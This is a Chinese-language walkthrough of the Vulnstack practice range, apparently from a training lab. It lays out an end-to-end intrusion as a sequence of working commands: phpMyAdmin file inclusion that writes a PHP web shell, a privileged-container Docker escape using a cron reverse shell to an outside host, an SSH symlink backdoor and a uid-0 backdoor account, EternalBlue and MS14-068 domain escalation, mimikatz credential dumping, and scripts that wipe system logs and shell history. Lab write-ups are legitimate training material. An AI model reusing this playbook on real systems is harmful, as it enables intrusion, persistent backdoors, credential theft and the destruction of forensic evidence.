vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/
我这里大致设置了一下不想改内网ip段了,ubuntu外网ip:192.168.1.136
环境机器开机密码
ubuntu:ubuntu域成员机器
douser:Dotest123
administrator:Test2008
环境是在Ubuntu上用docker做的,需要启动docker容器
都开开就完事了嗷
使用nmap对当前外网ip进行扫描
nmap -sV 192.168.1.136 -n
未授权直接进入phpmyadmin
远程文件包含payload:
http://http://192.168.1.136:2003/?target=db_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd
包含session文件
首先在SQL处执行 select ‘’;
复制下来cookie,构造payload
http://192.168.1.136:2003/?target=db_sql.php%253f/../../../../../../../../tmp/sess_66987e701a84794da7a7a7da72653e76
SELECT `<?php fputs(fopen("a.php","w"),'');?>`;
判断是否为docker 环境
1、使用下面命令,查看是否存在 dockerrnv 文件
ls -alh /.dockerenv
2、查看系统进程的cgroup信息
cat /proc/1/cgroup
众所周知docker一般getshell都是root权限
利用特权模式逃逸
如果是通过特权模式启动容器,就可以获得大量设备文件的访问权限,因为管理员执行docker run —privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。当docker容器内拥有宿主机文件读写权限时,可以通过写ssh密钥、计划任务等方式达到逃逸。
创建一个文件夹,将宿主机根目录挂载至容器目录下
查看磁盘文件: fdisk -l
新建目录以备挂载: mkdir /test
将宿主机/dev/sda1 目录挂载至容器内 /test: mount /dev/sda1 /test
即可写文件获取权限或数据
写入一个反弹 shell 脚本:
touch /test/tmp/test.sh
chmod +x /test/tmp/test.sh
ls -ll /test/tmp/test.sh
echo '#!/bin/bash' >> /test/tmp/test.sh
echo '/bin/bash -i >& bash -i >& /dev/tcp/192.168.1.128/13122 0>&1' >> /test/tmp/test.sh
或者
sed -i '$a\/bin/bash -i >& bash -i >& /dev/tcp/1192.168.1.133/13122 0>&1' /test/tmp/test.sh
cat /test/tmp/test.sh
写入任务计划
sed -i '$a*/2 * * * * root bash /tmp/test.sh ' /test/etc/crontab
cat /test/etc/crontab
nc -lvvp 13122
换成了kali2020才逃逸成功,在docker 逃逸过程中,使用crontab 提权到root 权限
SSH 软连接后门,软连接后门的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su),然而su在pam_rootok只检测uid 0即可认证成功,这样就导致了可以使用任意密码登录。
ln -sf /usr/sbin/sshd /tmp/su
/tmp/su -oPort=888
用户名Ubuntu 任意密码登录
添加 uid 0 用户后门
useradd -p `openssl passwd 123456` -o -u 0 hacker
直接用EW做代理
./ew_for_linux64 -s ssocksd -l 8888
kali设置代理
vim /etc/proxychains.conf
设置 proxychains bash 全局终端
proxychains bash
id 查看当前用户的权限和所在的管理组
uname -a 查看linux版本内核信息
cat /proc/version 查看内核信息
cat /etc/*release 查看linux发行信息
dpkg -l 查看安装的包
crontab -l 是否有计划任务
/sbin/ifconfig -a 查看ip地址等
cat /etc/passwd 普通用户可以查看用户的信息
cat /etc/shadow 账号密码信息
cat /root/.mysql_history 查看mysql历史操作
cat /root/.bash_history 查看用户指令历史记录
find / -perm -u=s -type f 2>/dev/null 匹配高权限的文件,看是否有利用点
for k in $( seq 1 255);do ping -c 1 192.168.183.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
nmapC段探测
nmap -sn -PE -T4 192.168.183.0/24
nmap -sV -sT -Pn -n 192.168.183.129-130
打着玩试试
扫描模块 auxiliary/scanner/smb/smb_ms17_010
漏洞利用模块 exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
安照网上换了一个payload直接就成功了离谱,默认的payload不行
ipconfig
Net group "domain controllers" /domain
走一遍开启远程桌面流程,先添加用户
发生错误emmm,先关闭防火墙把
run post/windows/manage/enable_rdp
刚刚把编码处理了一下,原来是密码强度不够
chcp 65001
net user flag asd123ASD! /add
net localgroup administrators flag /add
开启3389
run post/windows/manage/enable_rdp
或者
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
该漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。
1.域控没有打MS14-068的补丁
2.攻击者拿下了一台域内的普通计算机,并获得普通域用户以及密码/hash值,以及用户的suid
Ms14-068.exe 下载地址:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
上传mimikatz
privilege::debug 提取权限
sekurlsa::logonpasswords 抓取密码
整理信息
USER:douser
Domain:DEMO.COM
NTLM:bc23b0b4d5bf5ff42bc61fb62e13886e
SID:S-1-5-21-979886063-1111900045-1414766810-1107
PASSWORD:Dotest123
上传MS14-068
MS14-068.exe -u douser@DEMO.COM -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130
通过 mimikatz 导入TGT票据将写入,从而提升为域管理员
kerberos::purge
kerberos::ptc TGT_douser@DEMO.COM.ccache
dir \\WIN-ENS2VR5TR3N\c$
生产一个正向连接payload:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8989 -f exe-service -o /root/360.exe
关闭域控防火墙,将payload复制到域控:
sc \\WIN-ENS2VR5TR3N create ProFirewall binpath= "netsh advfirewall set allprofiles state off"
xcopy 360.exe \\WIN-ENS2VR5TR3N\c$
创建服务成功,开启防火墙,运行 payload
sc \\WIN-ENS2VR5TR3N create Startup binpath= "C:\360.exe"
sc \\WIN-ENS2VR5TR3N start ProFirewall
sc \\WIN-ENS2VR5TR3N start Startup
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.183.130
set lport 8989
ps #获取目标主机正在运行的进程
getpid #查看meterpreter shell的进程号
steal_token #窃取令牌
migrate 1584
然后使用migrate 1584命令将shell移到PID为1584的explorer.exe进程里,因为该进程是一个稳定的应用。
kiwi模块
使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。
load kiwi #加载kiwi模块
creds_all #该命令可以列举系统中的明文密码
开启3389
run post/windows/manage/enable_rdp
或者
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
administrator DEMO.COM Test2009
清除命令历史记录
histroy -r #删除当前会话历史记录
history -c #删除内存中的所有命令历史
rm .bash_history #删除历史文件中的内容
HISTZISE=0 #通过设置历史命令条数来清除所有历史记录
在隐蔽的位置执行命令
使用vim打开文件执行命令
:set history=0
:!command
linux日志文件
/var/run/utmp 记录现在登入的用户
/var/log/wtmp 记录用户所有的登入和登出
/var/log/lastlog 记录每一个用户最后登入时间
/var/log/btmp 记录错误的登入尝试
/var/log/auth.log 需要身份确认的操作
/var/log/secure 记录安全相关的日志信息
/var/log/maillog 记录邮件相关的日志信息
/var/log/message 记录系统启动后的信息和错误日志
/var/log/cron 记录定时任务相关的日志信息
/var/log/spooler 记录UUCP和news设备相关的日志信息
/var/log/boot.log 记录守护进程启动和停止相关的日志消息
完全删除日志文件:
cat /dev/null > filename
: > filename
> filename
echo "" > filename
echo > filename
针对性删除日志文件:
删除当天日志
sed -i '/当天日期/'d filename
一键清除脚本:
#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/./bash_history
history -c
windows
1.查看事件日志
run event_manager -i
2.删除事件日志
run event_manager -c
3.clearv命令清除目标系统的事件日志。
MSF
run event_manager -i 查看日志
run event_manager -c 删除事件日志
参考的大佬们博客:
https://blog.csdn.net/qq_38626043/article/details/119620612
https://blog.csdn.net/weixin_42918771/article/details/116207505
https://blog.csdn.net/a709046532/article/details/119917671
https://www.cnblogs.com/yuzly/p/10859520.html
本文仅作靶场实战教程,禁止将本文演示的技术方法用于非法活动,违者后果自负。